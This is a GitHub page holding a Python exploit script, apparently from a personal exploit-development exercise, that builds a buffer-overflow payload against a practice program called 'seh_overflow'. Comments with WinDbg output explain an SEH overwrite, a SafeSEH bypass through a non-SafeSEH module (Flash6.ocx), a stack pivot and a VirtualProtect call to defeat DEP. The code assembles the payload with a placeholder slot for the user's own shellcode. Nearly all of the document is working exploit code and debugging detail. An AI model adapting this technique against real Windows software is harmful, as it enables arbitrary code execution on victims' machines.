-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathexploit_seh_harden.py
executable file
·87 lines (74 loc) · 2.86 KB
/
exploit_seh_harden.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
# Name : Abhinav Thakur
# Email: [email protected]
# Description : This exploit takes advantage of a buffer overflow bypassing DEP
# and SafeSEH environment hijacking control flow of the software
# application named 'seh_overflow' (in seh_hardened directory)
# and eventually achieving arbitrary code execution.
# Game plan:
# 1. Overwriting SEH funciton pointer.
# 2. Transfering code flow to the .code segment of 'Flash6.ocx' module which
# does not ensure 'SafeSEH' mitigation.
# 3. Calling VirtualProtect() to change memory protections on stack
# 4. Executing our shellcode on stack. Yay!!
# Useful info.
# 0:000> !exchain
# 0012ffb0: seh_overflow!_except_handler4+0 (00401835)
#
# 0012fb6c: Address of input buffer
#
# 0:000> ?12ffb0-12fb6c
# Evaluate expression: 1092 = 00000444
# 0x1008d3cb : Address of cc opcode in Flash6.ocx
# At the time of redirection of control flow to flash6.ocx -
# esp=0012f6c0
#
# Controlling esp
# add esp, X (add esp = 81 c4)
#
# 12f6c0 + X = 12fb6c (start of input buffer address)
# 12f6c0 + Y = 12ffc4 (safe end of user input buffer)
#
# 12ffc4 : addresss of return pointer
#
# 4ac < X < 904 (wiggle space is within our user-input buffer only)
#
# 0:000> s flash6 l94000 81 c4
# 0:000> u 1008e5fe
# Flash6!DllUnregisterServer+0x4361a:
# 1008e5fe 81c400060000 add esp,600h
# 1008e604 c3 ret return to 12fcc0
#
# Call to VirtualProtect() after stack pivoting, stack should look like bellow-
#
# 7c801a5d <--- kernel32!VirtualProtectEx
#
# (windbg) !address
# 126000 - 13000 (size: a000) --> memory area PAGE_READWRITE.
#
# VirtualProtectEx Address = 0x7c801a5d # ESP points here after pivot
# Return address for VirtualAlloc = 12fb6c # return to our shellcode
# hProcessArgument = 0xffffffff
# lpAddressArgument = 0x126000
# dwSizeArgument = 0xA000
# flNewProtectArgument = 0x40
# lplOldProtectArgument = 13fd00
import struct
# Insert your shellcode in the 'shellcode byte array' and add 1 NOP after shellcode
shellcode = ("\xcc\xcc\xcc\xcc")
payload = "\x90" * 4
payload += shellcode
payload += "\x90" * (340 - len(shellcode) - 4 )
payload += struct.pack("I", 0x7c801a5d) # 0xdeadbeef
payload += struct.pack("I", 0x0012fb6e) # Return to our shellcode
payload += struct.pack("I", 0xffffffff)
payload += struct.pack("I", 0x00126000)
payload += struct.pack("I", 0x0000a000)
payload += struct.pack("I", 0x00000040)
payload += struct.pack("I", 0x0012ff00)
payload += "C" * (1092 - 340 - 28)
payload += struct.pack("I", 0xdeadbeef) # next pointer in list
payload += struct.pack("I", 0x1008e5fe) # exception function pointer
payload += "\x90" * 10000
fo = open('C:\mal_input_seh_hardened', 'w')
fo.write(payload)
fo.close()